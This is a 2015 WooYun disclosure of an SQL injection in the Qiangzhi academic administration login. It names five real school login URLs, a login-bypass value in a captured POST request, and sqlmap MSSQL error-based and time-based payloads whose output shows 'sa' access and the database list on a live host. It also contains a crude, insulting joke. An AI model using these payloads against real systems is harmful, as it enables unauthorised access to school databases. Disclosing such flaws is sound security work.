当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103191

漏洞标题:强智科技教务管理系统SQL注射漏洞

相关厂商:qzdatasoft.com

漏洞作者: term

提交时间:2015-03-24 15:28

修复时间:2015-06-27 15:30

公开时间:2015-06-27 15:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-29: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-23: 细节向核心白帽子及相关领域专家公开
2015-06-02: 细节向普通白帽子公开
2015-06-12: 细节向实习白帽子公开
2015-06-27: 细节向公众公开

简要描述:

男:问世间情为何物,只...女:一个大嘴巴子打上去,啪!去你妈逼的程序员还想找女朋友,活该死在代码上.

详细说明:

应乌云要求,五个案例!

http://jwxt.hifa.edu.cn/jiaowu/jwxs/login.asp
http://221.232.159.24/dhjw/jwxs/login.asp
http://jiaowu.hustwenhua.net/jwxs/login.asp
http://xscx.cmcedu.cn/jwxs/login.asp
http://jwxt.hycgy.com:5000/jwxs/login.asp


登录的时候抓包

QQ截图20150323134521.png


2.png


POST /dhjw/jwxs/login.asp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://221.232.159.24/dhjw/jwxs/login.asp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 221.232.159.24
Content-Length: 108
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: LoginLb=; ASPSESSIONIDCSACRCTD=MMHJDOJDHFEIOOCPPELOLJME
datetime=2015-3-23+13%3A12%3A50&loginNum=&Account=%27or%27%3D%27or%27&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1


1.png


123.png


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: Account
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-2532' OR 7256=CONVER
T(INT,(SELECT CHAR(113) CHAR(106) CHAR(112) CHAR(122) CHAR(113) (SELECT (CASE WH
EN (7256=7256) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(118) C
HAR(113) CHAR(113))) AND 'ogOj'='ogOj&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-4128' OR 4975=(SELEC
T COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS s
ys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'QvyA'='QvyA&Passwor
d=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
---
[13:47:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[13:47:47] [INFO] fetching current user
you provided a HTTP Cookie header value. The target URL provided its own cookies
 within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] Y
[13:47:49] [INFO] retrieved: sa
current user:    'sa'
[13:47:49] [INFO] fetching current database
[13:47:49] [INFO] retrieved: dhjw
current database:    'dhjw'
[13:47:49] [INFO] fetching database names
[13:47:49] [WARNING] reflective value(s) found and filtering out
[13:47:49] [WARNING] the SQL query provided does not return any output
[13:47:49] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[13:47:49] [INFO] fetching number of databases
[13:47:49] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[13:47:51] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[13:47:52] [ERROR] unable to retrieve the number of databases
[13:47:52] [INFO] retrieved: dhjw
[13:47:52] [INFO] retrieved: master
[13:47:52] [INFO] retrieved: tempdb
[13:47:53] [INFO] retrieved: model
[13:47:53] [INFO] retrieved: msdb
[13:47:53] [INFO] retrieved: ReportServer
[13:47:53] [INFO] retrieved: ReportServerTempDB
[13:47:53] [INFO] retrieved: dhjw
[13:47:54] [INFO] retrieved:
available databases [7]:
[*] dhjw
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[13:47:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 23 times
[13:47:54] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\221.232.159.24'
[*] shutting down at 13:47:54

漏洞证明:

123.png

修复方案:

你们更专业啦!

版权声明:转载请注明来源 term@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-27 15:30

厂商回复:

最新状态:

暂无